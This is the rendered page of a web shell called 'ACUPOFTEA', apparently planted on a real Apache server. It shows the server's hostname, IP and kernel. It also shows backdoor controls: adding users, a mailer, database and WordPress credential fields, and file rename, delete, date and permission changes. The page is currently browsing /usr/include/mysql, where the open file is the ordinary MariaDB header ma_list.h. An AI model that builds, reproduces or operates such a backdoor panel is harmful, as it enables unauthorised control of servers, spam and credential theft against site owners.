System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
include
/
mysql
/
216.73.216.49
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
ma_list.h
/* Copyright (C) 2000 MySQL AB & MySQL Finland AB & TCX DataKonsult AB This library is free software; you can redistribute it and/or modify it under the terms of the GNU Library General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Library General Public License for more details. You should have received a copy of the GNU Library General Public License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02111-1301, USA */ #ifndef _list_h_ #define _list_h_ #ifdef __cplusplus extern "C" { #endif typedef struct st_list { struct st_list *prev,*next; void *data; } LIST; typedef int (*list_walk_action)(void *,void *); extern LIST *list_add(LIST *root,LIST *element); extern LIST *list_delete(LIST *root,LIST *element); extern LIST *list_cons(void *data,LIST *root); extern LIST *list_reverse(LIST *root); extern void list_free(LIST *root,unsigned int free_data); extern unsigned int list_length(LIST *list); extern int list_walk(LIST *list,list_walk_action action,char * argument); #define list_rest(a) ((a)->next) #define list_push(a,b) (a)=list_cons((b),(a)) #define list_pop(A) do {LIST *old=(A); (A)=list_delete(old,old) ; ma_free((char *) old,MYF(MY_FAE)); } while(0) #ifdef __cplusplus } #endif #endif
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-08-07 11:01:51
..
DIR
-
drwxr-xr-x
2025-10-28 10:57:27
mariadb
DIR
-
drwxr-xr-x
2025-08-07 11:01:51
mysql
DIR
-
drwxr-xr-x
2025-08-07 11:01:51
server
DIR
-
drwxr-xr-x
2025-08-07 11:01:51
errmsg.h
text/x-c
4.8 KB
-rw-r--r--
2025-07-28 03:52:29
ma_list.h
text/x-c
1.58 KB
-rw-r--r--
2025-07-28 03:52:29
ma_pvio.h
text/x-c
4.47 KB
-rw-r--r--
2025-07-28 03:52:29
ma_tls.h
text/x-c
4.24 KB
-rw-r--r--
2025-07-28 03:52:29
mariadb_com.h
text/plain
18.33 KB
-rw-r--r--
2025-07-28 03:52:29
mariadb_ctype.h
text/x-c
2.53 KB
-rw-r--r--
2025-07-28 03:52:29
mariadb_dyncol.h
text/x-c
8.08 KB
-rw-r--r--
2025-07-28 03:52:29
mariadb_rpl.h
text/x-c
18.93 KB
-rw-r--r--
2025-07-28 03:52:29
mariadb_stmt.h
text/x-c
9.41 KB
-rw-r--r--
2025-07-28 03:52:29
mariadb_version.h
text/x-c
1.18 KB
-rw-r--r--
2025-07-28 03:56:48
my_alloca.h
text/plain
148 B
-rw-r--r--
2025-07-28 05:05:54
my_config.h
text/plain
148 B
-rw-r--r--
2025-07-28 05:05:54
my_global.h
text/plain
148 B
-rw-r--r--
2025-07-28 05:05:54
my_sys.h
text/plain
148 B
-rw-r--r--
2025-07-28 05:05:54
mysql.h
text/x-c
40.9 KB
-rw-r--r--
2025-07-28 03:52:29
mysql_com.h
text/x-c
174 B
-rw-r--r--
2025-07-28 05:05:54
mysql_version.h
text/x-c
230 B
-rw-r--r--
2025-07-28 05:05:54
mysqld_error.h
text/x-Algol68
46.87 KB
-rw-r--r--
2025-07-28 04:21:56
~ ACUPOFTEA - mail.ontime-ae.com